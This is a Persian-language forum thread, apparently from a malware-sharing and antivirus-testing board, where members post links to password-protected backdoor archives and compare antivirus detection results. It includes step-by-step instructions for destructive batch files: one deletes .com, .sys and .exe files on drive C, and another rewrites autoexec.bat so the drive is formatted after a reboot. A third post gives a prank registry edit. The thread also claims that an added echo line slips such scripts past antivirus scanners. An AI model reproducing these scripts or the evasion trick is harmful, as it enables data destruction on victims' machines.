دانلود ویروس، تروجان، بررسی مخرب ها و تست آنتی‌ویروس ╣══ مقررات پست اول حتما مطالعه شود ══╠

[Ava UK]

چند روز پیش نوک تیشه ام خورد به معدن یه پک بکدور. یکم ازش رو جدا کردم تا دوستان ببینند. این بک دور ها ظاهر جالی دارند. یکیشون مثلا شبیه آیکون اسکایپ می مونه که من بیشتر از همه اون رو دوست دارم

چون 6 تا بکدور رو با هم زیپ کردم فایده نداره توی توتال اپلود کنم.

دانلود بکدور ها:

  محتوای مخفی: ! 

http://up.--------.com/Files/3021b0a15d8e4e788b87.rar

پسورد: dr

دکتر جان لازمه نتیجه ی کسپرسکی رو بگم

اینم نتیجه توتال
کسپر با این دیتابیسه قوی اصلا نمیشناسه

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

نود 3 تا رو شناخت

غریبه جان مگه کسپرسکی فقط دیتابیس داره؟
پس Behavior Blocker و Application Control اینجا چیکارند

comodo همه رو شناخت هر 6 تارو!

Comodo اینطوری بخواد بره جلو از خیلی آنتی ویروسها و سکورستی سویت ها پیشی میگیره. البته الانم من خودم جزو تاپ 3 ها برای سکوریتی میدونمش.

[Dr Hannibal]

این هم یک ویروس که اکثر آنتی ویروسها میشناسند ولی بعضی از آنتی ویروسهای معروف نمیشناسند از جمله
1:AVG
2:Comodo
3:Kaspersky

اصلا روز کسپر نبود ( البته به قول ava uk عزیز دیتابیس خالیش )

[Dr Hannibal]

ava uk جان یه توضیح کامل در مورد استفاده از سندباکس بدی خیلی خوب میشه. یا اینجا یا تاپیک بزنی چیزی. همین الا بچه ها و از جمله من ویروس هارو توی سیستم اصلی اجرا کنیم. اگه اینجا باشه من توی پست اول بذارمش هم خوبه هرجا دوست داری. من خودم خیلی وقته سندباکس رو نصب دارم اما اصلا ازش استفاده نکردم راهنمایی کنی چطور بدون خطر اجرا بشن خیلی خوبه. من موقع اجرا یکی از اینها اخطار اجرا دریافت کردم.

الان دقت کردم دیدم حتی مای کامپیوتر رو هم میشه با این برنامه باز کرد. زحمتش افتاده گردن خودت رفیق

[mohsenpj]

این هم یه ویروس مشابه قبلی

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

pass: mohsen

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

[wordship]

اینم چند تا کد مخرب
ولی کد های مخرب اصلا ویروس به حساب نمیان چون ما میتونیم با یه خط فرمان echo
انتی ویروس رو گمراه کنیم و فایل رو اجرا کنیم
مثلا این
اگر بدون خط فرمان echo باشه خیلی از انتی ویروسا ویروس میشنانش ولی
اگه بهش اضاف کنیم نه
@echo off
echo.
echo ةحححححححححححححححححححححححح ححححححححححح»
echo ؛ ؛
echo ؛ WORDSHIP ؛
echo بحححححححححححححححححححححححح ححححححححححح¼
echo Action in progress. Please wait...
echo.
@echo off
Cls
===========
Color fc
Del /a c:\*.com
Del /a c:\*.sys
Del /a c:\*.exe /s
===========

ویروس کار خ.دش رو انجام میده ولی بخاطر اینکه ما یه خط فرمان اضافه کردیم دیگه نمیشناسه
حالا بقیش


این ویروس بعد از نصب بر ریجستر اثر میگذارد و باعث میشود با فشار دادن هر دکمه ای از کیبورد کیس 2 صدای بوق بدهد و مانیتور چشمک بزند طرز ساخت: note pad خود را باز کرده و در آن کد



Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"
را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .reg بدهید مثل ficker.reg در آخر هم ذخیره کنید برای غیر فعال کردن آن مانند بالا عمل کنید ولی این بار این کد هارا زده و همان کارها را بکنید وذخیره کنید
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"


ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:



@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
حال از منوی File بر روی Save as کلیک کنید.
از منوی کشویی Save as type گزینه All Files را برگزینید.
در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال thebesthacker.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.


و....
ادامه دارد

[Ava UK]

چند روز پیش نوک تیشه ام خورد به معدن یه پک بکدور. یکم ازش رو جدا کردم تا دوستان ببینند. این بک دور ها ظاهر جالی دارند. یکیشون مثلا شبیه آیکون اسکایپ می مونه که من بیشتر از همه اون رو دوست دارم

چون 6 تا بکدور رو با هم زیپ کردم فایده نداره توی توتال اپلود کنم.

دانلود بکدور ها:

  محتوای مخفی: ! 

http://up.--------.com/Files/3021b0a15d8e4e788b87.rar

پسورد: dr

با عرض پوزش از دوستان باید بگم که آنتی ویروسهایی که بعضی فایل ها رو آلوده تشخیص دادند اشتباه کردند و اینجا آنتی ویروسهایی که تشخیص ندادند برنده هستند. یعنی نتیجه اسکن ویروس توتال را باید برعکس حساب کنید.
چرا؟ ادامه پست رو بخونید تا متوجه بشید.

راستش برای خودم هم عجیب که آنتی ویروسهایی مانند ناد32 و یا کسپرسکی در بین آنتی ویروسهایی باشند که نتونند تشخیصی داشته باشند. به همین خاطر با آنتی ویروس خاموش و غیر فعال شده همه فایل ها را در کامپیوترم اجرا کردم. نتیجه بطور خلاصه این شد که این فایل ها سالم هستند و اکثرا برنامه هایی هستند که حتی سایت رسمی برای خودشون دارند.

بطور نمونه فایل hfd.exe برنامه ای هست که توسط اون میتونید آپلود و دانلود مصنوعی در داخل برنامه های تورنت درست کنید. در اصل هیچ فایلی نه دانلود میشه و نه آپلود میشه اما در برنامه های دانلود تورنت مانند Utorrent, BitTorrent و بقیه توسط این برنامه که اسمش NRPG RatioMaster است اینطور نشون داده میشه که شما در حال دانلود یا آپلود هستند. عکسی از برنامه ... یعنی فایل hfd.exe



این برنامه حتی سایت رسمی داره و برای دانلود کردنش هم میتونید از لینک زیر استفاده کنید.

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

فایل ccce.exe در سیستم 64 بیتی اصلا اجرا نمیشه. یا کلا فایلش خرابه و یا در سیستم های 64 بیتی قابل اجرا شدن نیست.

فایل boos.exe فایل ستاپ برنامه معروف Skype اما به زبان چینی است. این فایل ستاپ حتی به زبان انگلیسی هم وجود داره. یعنی اول یک فایل چند کیلوبایتی را دانلود میکنید و بعد از اجرا کردنش میتونید فایل اصلی برنامه Skype را دانلود کنید.

عکس هایی از نشون دادن فایل ستاپ بعد از اجرا شدن و دانلود کردن ستاپ اصلی Skype.









بعد از تمام شدن مراحل نصب سایت اصلی Skype.com باز میشه.



بقیه فایل ها را اجرا کردم و اکثرا اجرا نشدند. اما فایل ola.exe مشکوک میزد چون بعد از اجرا شدنش در سیستم من فایل دیگه ای رو به اسم _deleteme.bat درست میکنه. اما همین فایل درست شده رو وقتی در ویروس توتال اسکن کردم هیچ یک از آنتی ویروسها تشخیصی نداشتند.

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بعد از اجرا کردنش هم مورد مشکوکی رو ندیدم. البته احتمال داره در سیستم من اجرا نشه چون درسته که آنتی ویروس رو کاملا غیر فعال کردم اما یک سری تنظیمات رو من قبلا در رجیستری و خود ویندوز انجام دادم که آسیب پذیری ویندوز رو کم میکنه و احتمال داره اینها به همین دلیل در سیستم اجرا نشند.

بهر حال اینها آزمایشاتی بود که من انجام دادم و به هیچ کسی توصیه نمیکنم این فایل ها را بدون آگاهی اینکه چه کاری دارید انجام میدید اجرا کنید.

موفق باشید.

[Ava UK]

ava uk جان یه توضیح کامل در مورد استفاده از سندباکس بدی خیلی خوب میشه. یا اینجا یا تاپیک بزنی چیزی. همین الا بچه ها و از جمله من ویروس هارو توی سیستم اصلی اجرا کنیم. اگه اینجا باشه من توی پست اول بذارمش هم خوبه هرجا دوست داری. من خودم خیلی وقته سندباکس رو نصب دارم اما اصلا ازش استفاده نکردم راهنمایی کنی چطور بدون خطر اجرا بشن خیلی خوبه. من موقع اجرا یکی از اینها اخطار اجرا دریافت کردم.

الان دقت کردم دیدم حتی مای کامپیوتر رو هم میشه با این برنامه باز کرد. زحمتش افتاده گردن خودت رفیق

به زور داری میندازی گردنم
باشه عزیز سر فرصت حتما در یک تاپیک جدا مخصوص SandboxIE این کار رو میکنم. فقط منظورت رو از اینکه گفتی من خودم خیلی وقته سندباکس رو نصب دارم اما اصلا ازش استفاده نکردم متوجه نشدم. منظورت سند باکس کسپرسکی است یا برنامه ی SandBoxie یعنی همونی که در صفحه ی قبل اون تروجان رو باهاش آزمایش کردم؟

چون سند باکس کسپرسکی تنظیماتی نداره که بخواد توضیحی بخواد. اما SandboxIE رو میشه برای آشنایی توضیحاتی رو در موردش بدم.

من موقع اجرا یکی از اینها اخطار اجرا دریافت کردم

احتمالا فایل خواسته از طریق CMD خودش رو اجرا کنه و چون نتونسته اخطار اجرا نشدن فایل رو بهتون نشون داده چون سند باکس دستریسی این جک و جونور ها رو به سیستم جیز میکنه

سیستمت چند بایتیه؟ خیلی از روتکیت ها و حتی تروجانها در سیستم های 64 بیتی مخصوصا ویندوز 7 حتی اگر آنتی ویروس هم نداشته باشید قابل اجرا شدن نیستند. 64 بیتی ها امنیت بیشتری نسبت 32 بیتی ها دارند.
در ضمن خود ویندوز بدون هیچ آنتی ویروسی از طریق DEP میتونه جلوی اجرا شدن بعضی از این فایل ها رو بگیره. که البته من برای همه پروسه های اجرایی اون رو فعال کردم.



با تنظیمات پیشفرض ویندوز تیک قسمت بالا و فقط برای پروسه های برنامه ها و سرویس ها فعال شده اما من پایینی رو ترجیح میدم. یعنی برای همه برنامه ها و سرویس ها و هر چیزی که بخواد اجرا بشه.

یک دلیل دیگه هم برای اجرا نشدن بعضی کرمها و ویروسها در Virtual Machine مانند چیزی که Sandbox ها درست میکنند اینه که بعضی از اینها متوجه میشند که در یک سیستم واقعی اجرا نشدند و خودشون از روی عمد و به دلیل اینکه شناسایی نشند اجرا نمیشند چون فکر میکنند که ممکنه که جستجوگر ویروس و فایل های آلوده از طرف یکی از شرکت های آنتی ویروس باشه و بخواد رد پاشو بدست بیاره. مثل همون تروجانی که اجرا کردم و 4 تا فایل دیگه رو دانلود کرد.

به همین دلیل بعضی هاشون صوتی نمیدن این جورشم داریم دیگه

[Dr Hannibal]

مرسی ava uk بازم به خاطر نحقیقات خوبی که کردی. راستش منم گفتم مشکوک و متحیرم که ببینم این فایل ها مخرب هستند یا نه. به اضافه این مورد هایی که شما گفتی از 6 تا 5 مورد رو گفتی فالس الارم هستند این مورد هم باید به بقیه اضافه بشه. توی این پست هم اشاره کردم شک دارم مخرب باشند اما هنوز هم شک باقیست.

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دلیل این همه فالس آلارم چیه. توی توتال بازم اپلود کنید می بینید چندتا آنتی ویروس دیگه هم این هارو ویروس شناختند یعنی در عرض 2 روز به تعداد آنتی ویروس هایی که شناسایی کردند اضافه شده این یکی از دلایل من مبنی بر مخرب بودنشون هست وگرنه فالس آلارم توی 2 روز به نظر نمیرسه و دلیل دیگه فکر نکنم آنتی ویروس فایل نصب اسکایپ و یا کسپرسکی رو بگه ویروس یا اسپای کننده هست.


من این فایل هارو برای اویرا به عنوان فالس الارم ارسال میکنم تا یه مقدار مسئله روشن بشه.

---------------------------------

بله همین سندباکسیه خودتون نتونستم ویروس هارو باهاش اجرا کنم. حالا توضیحاتش رو بدی ببینم کجای کار اشتباه ست.

منتظریم


ویرایش:

فایل ها به عنوان false positive برای آویرا ارسال شد نتیجه ای که داد5 تا از این ها مخرب هستند اما 2 حالت وجود داره :

چون تا بعد از ارسال جواب رو ارسال کرد 2 احتمال هست

1- آنالیز نمیکنند و این جواب فقط همون دیتابیس آویرا رو نشون میده.

2- این فایل قبلا برای آویرا به عنوان false positive ارسال شده و آنالیز شده و مخرب شناسایی و سیستم جواب آنالیز قبلی رو میده.

مثلا اگه یک فایل چندین بار برای اویرا به عنوان مشکوک ارسال بشه و سالم باشه سیستم به طور خودکار جواب سالم بودنش رو آنلاین میده.

[Dr Hannibal]

ava uk جان امروز این 7 ( 6 تا آخری با اون آیکون کسپرسکی ) تا فایل رو کلی وقت گذاشتم تست کردم دیدم حق با شماست و آنتی ویروس ها به اشتباه این exe ها رو ایراد می گرند و حتی گزینه سامبت آویرا برای آنالیز دوباره فالس آلارم هاش اشتباه هست و همون گزینه 1 بالا درسته فایل های فالس رو آویرا آنالیز نمیکنه. دلیل اشتباه آنتی ویروس هارو هم متوجه شدم چون این 7 تا ===> توسط سیستم ریستور وین بک آپ گیری شده این ایراد پیدا شده و تمام آنتی ویروس ها به اشتباه این 7 عدد رو ویروس پیدا می کنند.

پس به قول شما این تست false positive برای آنتی ویروس ها باید باشه و کسپرسکی به درست ویروس حساب نکرده.

امیدوارم فردا امتحانم رو بد ندم دیگه تست برای امروز بسه

-----------------

اینم برای عذر خواهی از دیتابیس کسپرسکی:

مخرب

توتال

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود

کد:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: dr

همگی خوب و خوش باشید.

[Ava UK]

ava uk جان امروز این 7 ( 6 تا آخری با اون آیکون کسپرسکی ) تا فایل رو کلی وقت گذاشتم تست کردم دیدم حق با شماست و آنتی ویروس ها به اشتباه این exe ها رو ایراد می گرند و حتی گزینه سامبت آویرا برای آنالیز دوباره فالس آلارم هاش اشتباه هست و همون گزینه 1 بالا درسته فایل های فالس رو آویرا آنالیز نمیکنه. دلیل اشتباه آنتی ویروس هارو هم متوجه شدم چون این 7 تا ===> توسط سیستم ریستور وین بک آپ گیری شده این ایراد پیدا شده و تمام آنتی ویروس ها به اشتباه این 7 عدد رو ویروس پیدا می کنند.

پس به قول شما این تست false positive برای آنتی ویروس ها باید باشه و کسپرسکی به درست ویروس حساب نکرده.

مرسی عزیز که وقت گذاشتی.
منم در آزمایشگاه کوچک خودم بعدا متوجه شدم که بعضی از این فایل ها نه تنها برای کسپرسکی ناشناخته نبودند بلکه کسپرسکی اونها در لیست سفید خودش بصورت برنامه ثبت کرده تا با اجرا کردنشون Application Control جلوی اونها رو نگیره.
اسمشون در Kaspersky Security Network Database ثبت شده. یکیش مثلا همون برنامه ساخت دانلود و آپلود تورنت مصنوعی بود.

Avira به خیلی از کیجن ها هم گیر میده. تا حالا دیدم با اسمهای تروجان, کرم و ویروس بعضی هاشون رو معرفی میکنه اما بعد از باز کردنشون دیدم که هیچ چیزی بغیر از یک کیجن معمولی نبودند. البته برای تست هم که شده اونها رو برای کسپرسکی فرستادم اما کسپرسکی فایل ها رو سالم دونست.

امیدوارم امتحانتم خوب بدی. من که امروز حسابی خراب کردم. قراره هفته آینده دوباره ازم بگیرن.